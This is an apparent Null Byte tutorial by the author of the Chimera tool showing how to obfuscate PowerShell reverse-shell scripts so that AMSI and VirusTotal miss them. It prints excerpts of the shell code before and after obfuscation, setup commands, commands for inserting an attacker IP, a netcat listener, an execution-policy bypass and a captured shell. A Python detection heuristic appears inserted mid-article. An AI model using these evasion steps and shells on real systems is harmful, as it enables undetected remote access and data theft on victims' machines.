How to bypass VirusTotal & AMSI detection signatures with Chimera «Null Byte :: WonderHowTo



Microsoft's built-in antimalware solution does its best to prevent common attacks. Unfortunately for Windows 10 users, evading its detection requires almost no effort at all. An attacker armed with this knowledge can easily bypass the security software with any number of tools.

Because Microsoft's antimalware solution is Windows 10's first line of defense, it is the subject of extensive security research. This article gives a brief introduction to how attackers evade it entirely.

What is Antimalware Scan Interface (AMSI)?

The backbone of Microsoft's antimalware, introduced in Windows 10, is the Windows Antimalware Scan Interface, or AMSI. Antivirus software, including Windows Defender, can call its set of APIs to request scans of files, scripts, and other content for malware. To describe it briefly, let's look at Microsoft's definition:

Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to be integrated with any antimalware product available on a machine. AMSI provides enhanced malware protection for your end users and their data, applications, and workloads.

In the screenshot below, the attacker downloads a script ("shell.ps1") that contains only the code needed to open a connection to a remote server. When PowerShell scripts are run this way, AMSI uses signature-based detection to identify the malicious activity.

Below is a picture of the same script after obfuscation. Windows 10 runs it without complaint, and an arbitrary message is printed in the terminal once a connection to the attacker's server is established.

How Chimera works

Chimera is a PowerShell obfuscation script I created to bypass Microsoft's AMSI and commercial antivirus solutions. It takes malicious PowerShell scripts that are known to trigger antivirus software and uses simple string replacement and variable concatenation to evade common detection signatures. Below is an example of Chimera at work.

The following is an excerpt of Invoke-PowerShellTcp.ps1, the same “shell.ps1” script that previously triggered AMSI.

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

VirusTotal reports 25 detections for the script (shown below). This is not surprising, since Invoke-PowerShellTcp.ps1 is extremely well known.

Here is the same excerpt after being processed by Chimera:

# Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
              $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
       # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.

  # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
           # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
   # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
           $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
            $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
   # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.

VirusTotal reports 0 detections for the obfuscated version.
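From a defender's side, the traits visible in the obfuscated excerpt above can be turned into a simple detection heuristic. The script below is an added example (not part of the original post or of Chimera) in Python: it scores PowerShell text for three tells the excerpt shows, unusually long variable names, method names assembled from variables with `."$a$b"()`, and randomly cased type literals such as `[teXt.enCoDInG]`. The sample lines are constructed from the excerpt above and the thresholds are assumptions.

```python
import re
from collections import Counter

# Constructed sample, modelled on the Chimera output shown above (not the tool's own output).
SAMPLE = r'''
# As the station slowly moves into position, the pilots maneuver down a narrow trench.
          $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz"()
   # Darth Vader leads the counterattack himself.
          [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
   # Finally, it is up to Luke himself to make a run at the target.
          $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell")
'''

# Constructed control: the unobfuscated shape of the same lines.
CLEAN = r'''
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running")
$stream.Write($sendbytes,0,$sendbytes.Length)
'''

VAR_RE = re.compile(r'\$([A-Za-z_][A-Za-z0-9_]{19,})')    # identifiers of 20+ chars (assumed threshold)
DYN_CALL_RE = re.compile(r'\."\$[A-Za-z_][A-Za-z0-9_]*\$')  # method name built from variables: ."$a$b"(
TYPE_RE = re.compile(r'\[([A-Za-z.\[\]]+)\]')                 # [type] literals

def case_changes(name):
    """Count upper/lower transitions between adjacent letters; a cheap proxy for random casing."""
    return sum(1 for a, b in zip(name, name[1:])
               if a.isalpha() and b.isalpha() and a.isupper() != b.isupper())

def scan(script):
    """Return indicator counts for the Chimera traits visible on this page."""
    hits = Counter()
    for line in script.splitlines():
        s = line.strip()
        if not s:
            continue
        if s.startswith('#'):
            hits['comment_lines'] += 1      # Chimera inserts a comment between almost every line
            continue
        hits['code_lines'] += 1
        hits['long_vars'] += len(VAR_RE.findall(s))
        hits['dynamic_calls'] += len(DYN_CALL_RE.findall(s))
        # [teXt.enCoDInG] flips case far more often than [text.encoding] or [Text.Encoding]
        hits['odd_case_types'] += sum(1 for t in TYPE_RE.findall(s) if case_changes(t) >= 4)
    return dict(hits)

def is_suspicious(script):
    h = scan(script)
    return h.get('dynamic_calls', 0) > 0 or h.get('odd_case_types', 0) > 0 or h.get('long_vars', 0) >= 3

if __name__ == '__main__':
    print('obfuscated:', scan(SAMPLE), is_suspicious(SAMPLE))
    print('original:  ', scan(CLEAN), is_suspicious(CLEAN))
```

The same three checks are easy to carry over into an AMSI-consuming EDR rule or a YARA rule on script content; the point is that the tool's own tells are as detectable as the strings it hides.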

While I have uploaded a sample to VirusTotal, this is a very bad practice. As stated in its privacy policy:

All partners receive samples that their antivirus engines did not detect as potentially harmful if the same sample was detected as harmful by at least one other partner’s antivirus engine. This information sharing helps to correct potential vulnerabilities in the security industry.

In simpler terms, if even one antivirus engine detects a file created by Chimera, the file is distributed to over 75 antivirus companies. So do not upload files created by any obfuscation tool to VirusTotal. Instead, use a local, offline Windows 10 VM with antivirus solutions installed. That way, if a file is detected, it is not distributed to every major security company on the planet.

Step 1: Clone the Chimera Repository

To get started with Chimera, use the following command to update the APT repository and install the dependencies that Chimera needs to function properly.

~$ sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git

[sudo] password for user:
Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
coreutils is already the newest version (8.30-3+b1).
curl is already the newest version (7.68.0-1+b1).
curl set to manually installed.
gawk is already the newest version (1:5.0.1+dfsg-1).
gawk set to manually installed.
grep is already the newest version (3.4-1).
libc-bin is already the newest version (2.31-2).
perl is already the newest version (5.30.3-4).
sed is already the newest version (4.7-1).
xxd is already the newest version (2:8.2.0716-3).
The following additional packages will be installed:
   libjq1 (1.6-1)
   libonig5 (6.9.5-2)
The following NEW packages will be installed:
   jq (1.6-1)
   libjq1 (1.6-1)
   libonig5 (6.9.5-2)
0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
Need to get 378 kB of archives.

Then clone my Chimera repository with the git clone command. I put it in my /opt/chimera directory as shown below.

~$ sudo git clone https://github.com/tokyoneon/chimera /opt/chimera

Cloning into '/opt/chimera'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0
Unpacking objects: 100% (16/16), 805.04 KiB | 1.79 MiB/s, done.

Next, recursively (-R) change the ownership of the directory so the files can be used without root privileges.

~$ sudo chown $USER:$USER -R /opt/chimera/

Now change (cd) into the new /opt/chimera directory.

~$ cd /opt/chimera/

Then make the chimera.sh script executable so it can be run in Kali.

/opt/chimera$ sudo chmod +x chimera.sh

Finally, to see the available options, run Chimera with the --help argument.

/opt/chimera$ ./chimera.sh --help

    ░ ./chimera --file powershell.ps1 --all --output /tmp/payload.ps1

  files:
    -f, --file          powershell file.ps1 to obfuscate
    -o, --output        override default output file location

  options:
    -a, --all           same as: -l 0 -v -t -c -i -p -h -s -b -j -k -e
    -l, --level         level of string manipulation (0=random,1=low,
                        2=med,3=high,4=higher,5=insane. default: 0)
    -v, --variables     replace variables with arbitrary strings,
                        use -v  to utilize
                        custom wordlist as variable name substitutions
    -t, --typedata      replace data types with arbitrary strings (e.g.,
                        System.IO.StreamWriter). use -t  to
                        include more
    -c, --comments      replace comments with arbitrary strings
                        use -c  to utillized custom
                        text instead of random strings
    -i, --insert        insert arbitrary comments into every line
    -h, --hex           convert ip addresses to hexidecimal values
    -s, --string        obfuscate provided strings, use -s 
    -b, --backticks     insert backticks into provided string, e.g., ne`w`-OB`je`cT
    -j, --functions     replace function names with arbitrary strings
    -d, --decimal       convert obfuscated payload to decimal format
                        improves AMSI evasion; increases AV detection
    -g, --nishang       remove nishang-specific characteristics
    -k, --keywords      search obfuscated output for words that may trigger
                        AV/VT. By default searches for common words (backdoor,
                        payload,nishang), use -k  to include more
    -r, --random        randomize character punctuation
    -p, --prepend       prepend random number of spaces to lines

  misc:
    -e, --examine       preview snippets of output file contents
    -q, --quiet         supress non-essential messages
    -z, --no-art        if you hate awesome ascii art
        --help          you're looking at it

Step 2: Obfuscate a PowerShell script

The shells/ directory contains several Nishang scripts and some generic ones. All have been tested and work. However, there is no guarantee how untested scripts will behave after being processed by Chimera. It is recommended to use only the included shells.

/opt/chimera$ ls -laR shells/

shells/:
total 60
-rwxrwx--- 1 user user 1727 Aug 29 22:02 generic1.ps1
-rwxrwx--- 1 user user 1433 Aug 29 22:02 generic2.ps1
-rwxrwx--- 1 user user  734 Aug 29 22:02 generic3.ps1
-rwxrwx--- 1 user user 4170 Aug 29 22:02 Invoke-PowerShellIcmp.ps1
-rwxrwx--- 1 user user  281 Aug 29 22:02 Invoke-PowerShellTcpOneLine.ps1
-rwxrwx--- 1 user user 4404 Aug 29 22:02 Invoke-PowerShellTcp.ps1
-rwxrwx--- 1 user user  594 Aug 29 22:02 Invoke-PowerShellUdpOneLine.ps1
-rwxrwx--- 1 user user 5754 Aug 29 22:02 Invoke-PowerShellUdp.ps1
drwxr-xr-x 2 user user 4096 Aug 30 18:53 misc
-rwxrwx--- 1 user user  616 Aug 29 22:02 powershell_reverse_shell.ps1

shells/misc:
total 36
-rwxrwx--- 1 user user 1757 Aug 12 19:53 Add-RegBackdoor.ps1
-rwxrwx--- 1 user user 3648 Aug 12 19:53 Get-Information.ps1
-rwxrwx--- 1 user user  672 Aug 12 19:53 Get-WLAN-Keys.ps1
-rwxrwx--- 1 user user 4430 Aug 28 23:31 Invoke-PortScan.ps1
-rwxrwx--- 1 user user 6762 Aug 29 00:27 Invoke-PoshRatHttp.ps1

Before using the scripts, change the hard-coded IP address (192.168.56.101) to your Kali address. To find your internal IP address, use ip -c a and look for the 192.168.X.X address. If you do not see one, your Kali system is probably configured with NAT; power off the virtual machine and switch its network adapter to host-only.

/opt/chimera$ sed -i 's/192.168.56.101/<your-kali-ip>/g' shells/*.ps1

The default port in all scripts is 4444. Use sed again to change it if necessary.

/opt/chimera$ sed -i 's/4444/<your-port>/g' shells/*.ps1

Now use the following command to obfuscate one of the available scripts with Chimera.

/opt/chimera$ ./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -o /tmp/chimera.ps1 -g -v -t -j -i -c -h -s -b -e

 _____________________________________________________

  ░░░░░░ ░░   ░░ ░░ ░░░    ░░░ ░░░░░░░ ░░░░░░   ░░░░░
 ▒▒      ▒▒   ▒▒ ▒▒ ▒▒▒▒  ▒▒▒▒ ▒▒      ▒▒   ▒▒ ▒▒   ▒▒
 ▓▓      ▓▓▓▓▓▓▓ ▓▓ ▓▓ ▓▓▓▓ ▓▓ ▓▓▓▓▓   ▓▓▓▓▓▓  ▓▓▓▓▓▓▓
 ██      ██   ██ ██ ██  ██  ██ ██      ██   ██ ██   ██
  ██████ ██   ██ ██ ██      ██ ███████ ██   ██ ██   ██
 _____________________________________________________

 ░ by @tokyoneon_

A lot happens in that command. I'll summarize each argument briefly, but review the user guide for an in-depth explanation and the cheatsheet for examples. Also remember to use --help for fuller descriptions.

  • -f: Input file.
  • -o: Output file.
  • -g: Strip several Nishang-specific characteristics from the script.
  • -v: Replace variable names.
  • -t: Replace data types.
  • -j: Replace function names.
  • -i: Insert arbitrary comments into every line.
  • -c: Replace comments with arbitrary data.
  • -h: Convert IP addresses to hexadecimal format.
  • -s: Replace various strings.
  • -b: Insert backticks into strings where possible.
  • -e: Examine the obfuscated file when the process is complete.

Step 3: Get a shell

In a new terminal, start a Netcat listener to receive incoming connections. Be sure to always use -v because some scripts do not provide a shell prompt when a new connection is established.

~$ nc -v -l -p 4444

listening on [any] 4444 ...

Move the chimera.ps1 file from Kali to a local Windows 10 machine. Then open a PowerShell terminal and run the file with the following command.

PS> powershell.exe -ep bypass C:\path\to\chimera.ps1

Back in Kali, the nc terminal will show the following output, without any complaints from AMSI.

~$ nc -v -l -p 4444

listening on [any] 4444 ...
192.168.56.105: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 49725
Windows PowerShell running as user  on
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\target>

AMSI is good, but not hacker-proof

Creating defensive security tools is no easy feat, and Microsoft's Antimalware Scan Interface is a perfect example. A motivated attacker always finds a way to slip past security. Chimera simply breaks strings into many pieces and reconstructs them from variables; other projects such as Invoke-Obfuscation take evasion to a masterful level.

Follow me on Twitter @tokyoneon_ and GitHub to keep track of my current projects. And for questions and concerns, leave a comment or ping me on Twitter.


Cover photo, screenshots, and GIFs by tokyoneon/Null Byte
